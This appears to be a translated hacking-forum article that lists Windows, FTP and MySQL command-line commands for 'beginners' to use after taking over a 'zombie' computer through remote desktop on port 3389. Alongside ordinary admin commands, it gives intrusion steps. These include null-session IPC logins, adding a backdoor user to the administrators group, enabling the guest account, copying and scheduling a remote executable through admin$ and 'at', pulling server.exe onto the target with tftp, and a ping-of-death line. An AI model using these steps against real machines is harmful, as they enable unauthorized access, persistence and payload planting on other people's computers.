3389 command highlights

Source: Internet
Author: User
Tags: net time, net send

Many new users don't know what to do after they get a zombie, so today I will share some commands that are frequently used after getting a zombie via 3389, hoping they are useful to you.
You can find a zombie to practise on.

net use \\ip\ipc$ "" /user:"" : create an empty IPC connection (null session)
net use \\ip\ipc$ "password" /user:"username" : create a non-empty IPC connection
net use h: \\ip\c$ "password" /user:"username" : log on directly and map the other party's C: drive to local drive H:
net use h: \\ip\c$ : after logging on, map the other party's C: drive to local drive H:
net use \\ip\ipc$ /del : delete the IPC connection
net use h: /del : delete the mapping of the other party's drive to local drive H:
net user username password /add : create a user
net user guest /active:yes : activate the guest user
net user : list all user accounts
net user account-name : view an account's attributes
net localgroup administrators username /add : add the user to the administrators group so that it has administrator permissions. Note: administrators is written with the plural s
net start : check which services are running
net start service-name : start a service (for example, net start telnet, net start schedule)
net stop service-name : stop a service
net time \\target-ip : view the target host's time
net time \\target-ip /set : synchronize the local computer's time with the target host's time; the /yes parameter skips the confirmation
net view : view the shares enabled on the local network
net view \\ip : view which shares are enabled on the peer host in the LAN
net config : display system network settings
net logoff : disconnect from shared resources
net pause service-name : pause a service
net send ip "text message" : send a message to the target
net ver : display the network connection type and information in use on the LAN
net share : list local shares
net share ipc$ : enable the ipc$ share
net share ipc$ /del : delete the ipc$ share
net share c$ /del : delete the C: share
net user guest 12345 : after logging on as the guest user, change its password to 12345
net password : change the system logon password
netstat -a : commonly used to check which ports are open
netstat -n : commonly used to view the network connections on a port
netstat -v : view work in progress
netstat -p protocol-name : view the usage of a protocol (for example, netstat -p tcp/ip views TCP/IP usage)
netstat -s : view the usage of all protocols in use
nbtstat -A ip : if any of ports 136 to 139 is open on the other party, view the user name that most recently logged on there (the user name is the entry before 03). Note: the -A parameter must be capitalized
tracert -parameter ip (or computer name) : trace the route taken by packets; the parameter "-w number" sets the timeout interval
ping ip (or domain name) : send 32 bytes of data to the host. Parameters: "-l [space] packet size"; "-n number of transmissions"; "-t" pings continuously
ping -t -l 65550 ip : ping of death (send packets larger than 64 KB repeatedly until stopped)
ipconfig (winipcfg) : view the local IP address on Windows NT and XP (Windows 95 and 98); the "/all" parameter of ipconfig shows all configuration information
tlist -t : display processes as a tree list (an additional system tool, not installed by default, found in the support\tools folder of the installation directory)
kill -f process-name : with the -f parameter, forcibly terminate a process (an additional system tool, not installed by default, found in the support\tools folder of the installation directory)
del -f file-name : with the -f parameter, read-only files can be deleted. /ar, /ah, /as and /aa delete read-only, hidden, system and archive files respectively; /a-r, /a-h, /a-s and /a-a delete all files except read-only, hidden, system and archive files respectively. For example, "del /ar *.*" deletes all read-only files in the current directory, and "del /a-s *.*" deletes all files in the current directory except system files
del /s /q directory or rmdir /s /q directory : /s deletes all subdirectories and files in the directory; the /q parameter skips the deletion confirmation and deletes directly (the two commands serve the same purpose)
move drive:\path\file-to-move destination-path\new-file-name : move a file; the /y parameter skips the confirmation and directly overwrites a file of the same name in the destination directory
fc one.txt two.txt > 3st.txt : compare two files and write the result to 3st.txt. ">" and ">>" are redirection operators
at id : enable a registered scheduled task
at /delete : stop all scheduled tasks; the /yes parameter stops them without confirmation
at id /delete : stop a registered scheduled task
at : view all scheduled tasks
at \\ip time program-name (or a command) /r : run a program on the other party's host at the given time and restart the computer
finger username@host
telnet ip port : remotely log on to a server; the default port is 23
open ip : connect to an IP address (a command used after entering telnet)
telnet : type telnet directly on the local machine to enter the local telnet client
copy path\file1 path\file2 /y : copy file 1 to the specified directory as file 2; the /y parameter skips the confirmation when overwriting an existing file
copy c:\srv.exe \\ip\admin$ : copy the local c:\srv.exe to the other party's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg : join the two files into a new file 3st.jpg. Note: the header of 2st.txt must be three empty lines. Parameters: /b indicates a binary file, /a indicates an ASCII file
copy \\ip\admin$\srv.exe c:\ or copy \\ip\admin$\*.* c:\ : copy srv.exe (or all files) from the other party's admin$ share to the local C: drive
xcopy source-file-or-directory-tree destination-address\directory-name : copy a file and directory tree; the /y parameter overwrites files of the same name without prompting
tftp -i target-ip get server.exe c:\server.exe : after logging on to the target host, download server.exe from the specified IP to c:\server.exe on the target host. The -i parameter means binary transfer, used for exe files; without -i the transfer is in ASCII mode (text file mode)
tftp -i target-ip put c:\server.exe : after logging on, upload the local c:\server.exe to the host
ftp ip port : upload files to the server or perform file operations; the default port is 21. bin means binary transfer (for executable files); the default is ASCII transfer (for text files)

route print : display the IP routing table, showing the network address (Network Address), subnet mask (Netmask), gateway address (Gateway Address) and interface address (Interface)
arp : view and manipulate the ARP cache. ARP resolves an IP address to a physical MAC address; arp -a displays all entries
start program-name-or-command /max or /min : open a new window and run a program or command maximized (or minimized)
mem : view CPU usage
attrib file-name (or directory-name) : view the attributes of a file (or directory)
attrib file-name -a -r -s -h or +a +r +s +h : remove (or add) the archive, read-only, system and hidden attributes of a file; use + to add an attribute
dir : view files. The "/q" parameter shows the owner of files and directories; /t:c shows the file creation time; /t:a shows the last access time; /t:w shows the last modification time
date /t, time /t : with this parameter, "date /t" and "time /t" only display the current date and time without prompting for a new date or time
set variable-name=value : set an environment variable
set : display all current environment variables
set p (or other characters) : display all environment variables starting with p (or the given characters)
pause : suspend the batch program and display "Press any key to continue..."
if : conditional processing in a batch program (see if /? for the command and its variables)
goto label : direct cmd.exe to the labelled line in the batch program (the label must be on a separate line starting with a colon, for example the ":start" label)
call path\batch-file-name : call another batch program from a batch program (see call /? for details)
for : run a specific command on each file in a group of files (see for /? for the command and its variables)
echo on or off : enable or disable echo; echo without parameters displays the current echo setting
echo message : display the message on screen
echo message > pass.txt : save "message" to the file pass.txt
findstr "Hello" aa.txt : search for the string Hello in the file aa.txt
find file-name : find a file
title name : change the title of the cmd window
color value : set the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = light purple, E = light yellow, F = bright white
prompt name : change the command prompt displayed by cmd.exe (change C:\ and D:\ to EntSky\)
print file-name : print a text file
ver : display version information in the DOS window
winver : display version information (memory size, system version, patch version and computer name) in a pop-up window
format drive: /fs:type : format a disk; types: FAT, FAT32, NTFS; for example, format d: /fs:ntfs
md directory-name : create a directory
replace source-file destination-directory : replace files in the destination directory with the source file
ren original-file-name new-file-name : rename a file
tree : display the directory as a tree structure; the -f parameter lists the file names in the folders
type file-name : display the contents of a text file
more file-name : display the file contents page by page on screen
doskey command-to-lock=character : lock a command
doskey command-to-unlock= : unlock a command. doskey is the command-line facility provided for DOS (edit command lines, recall Win2k commands and create macros). For example, to lock dir: doskey dir=entsky (doskey dir=dir cannot be used); to unlock: doskey dir=
taskmgr : open the Task Manager
chkdsk /f d: : check disk D and display a status report; the /f parameter fixes disk errors
tlntadmn : telnet service administration. Type tlntadmn, select 3 and then 8 to change the telnet service's default port 23 to any other port
exit : exit the cmd.exe program; the /b parameter exits the current batch script instead of cmd.exe
path path-to-executable : set a search path for executable files
cmd : start a Windows 2000 command interpreter window. Parameters: /e:on and /e:off enable or disable command extensions; see cmd /? for details
regedit /s registry-file : import a file into the registry; the /s parameter means quiet mode, with no prompt
regedit /e registry-file : export the registry
cacls file-name parameters : display or modify the access control list (ACL) of a file (NTFS only). Parameters: /d user-name denies the user access; /p user-name:perm replaces the specified user's access permission; /g user-name:perm grants the specified user the access permission. perm can be: N none, R read, W write, C change (write), F full control. For example, cacls d:\test.txt /d pub denies the user pub access to d:\test.txt
cacls file-name : view the list of users with access permission to the file
rem text : add a comment to a batch file
netsh : view or change the local network configuration
IIS service commands:
iisreset /reboot : restart the Win2k computer (but a message warns that the system will restart)
iisreset /start or /stop : start or stop all Internet services
iisreset /restart : stop and restart all Internet services
iisreset /status : display the status of all Internet services
iisreset /enable or /disable : enable or disable restarting of Internet services on the local system
iisreset /rebootonerror : when the Internet services are started, stopped or restarted, restart the system if an error occurs
iisreset /noforce : if the Internet services cannot be stopped, do not forcibly terminate them
iisreset /timeout val : time in seconds to wait for the Internet services to stop; if the /rebootonerror parameter is specified, the computer restarts when the timeout is reached. The defaults are 20 seconds for restart, 60 seconds for stop and 0 seconds for reboot
FTP commands (details are given below):
The ftp command-line format is:
ftp -v -d -i -n -g [host-name]
-v displays all response messages from the remote server
-d uses debugging mode
-n disables automatic ftp logon, that is, the .netrc file is not used
-g disables file-name globbing
help [command] or ? [command] : view the description of a command
bye or quit : terminate the FTP process on the host and exit FTP
pwd : list the current directory on the remote host
put or send local-file [remote-file-name] : transfer a local file to the remote host
get or recv [remote-file] [local-file-name] : transfer a file from the remote host to the local host
mget [remote-files] : receive a batch of files from the remote host to the local host
mput local-files : transfer a batch of files from the local host to the remote host
dir or ls [remote-directory] [local-file] : list the files in the current remote host directory; if a local file is given, write the result to it
ascii : set file transfer to ASCII mode (the default)
bin or image : set file transfer to binary mode
bell : sound an alarm after each file transfer
cdup : return to the parent directory
close : close the ftp session with the remote server (the counterpart of open)
open host [port] : establish a connection to the specified ftp server; the connection port can be specified
delete remote-file : delete a file on the remote host
mdelete [remote-files] : delete a batch of files
mkdir directory-name : create a directory on the remote host
rename [from] [to] : rename a file on the remote host
rmdir directory-name : delete a directory on the remote host
status : display the current FTP status
system : display the remote host's system type
user user-name [password] [account] : log on to the remote host with another user name
open host [port] : establish a new connection
prompt : toggle interactive prompting mode
macdef : define a macro command
lcd : change the working directory on the local host; if no directory is given, change to the current user's home directory
chmod : change file permissions on the remote host
case : when on, the mget command converts the names of files copied to the local machine to lowercase
cd remote-directory : enter a directory on the remote host
cdup : enter the parent directory of the current remote host directory
! : run an interactive shell on the local machine; exit returns to the FTP environment, for example ! ls *.zip
MySQL commands:
mysql -h host-address -u user-name -p password : connect to MySQL; on a fresh MySQL installation, the superuser root has no password
(for example, mysql -h110.110.110.110 -uroot -p123456)
Note: no space is needed between -u and root; the same applies to the other options
exit : exit MySQL
mysqladmin -u user-name -p old-password password new-password : change the password
grant select on database.* to user-name@login-host identified by "password"; : add a new user (Note: unlike the commands above, the following commands in the MySQL environment end with a semicolon as the command terminator)
show databases; : display the list of databases. Initially there are only two databases, mysql and test. The mysql database contains MySQL system information; changing passwords and adding new users operate on this database
Whether or not this content is complete, I believe everyone will find a sense of accomplishment in it! Finally, I would like to remind you not to do anything illegal!
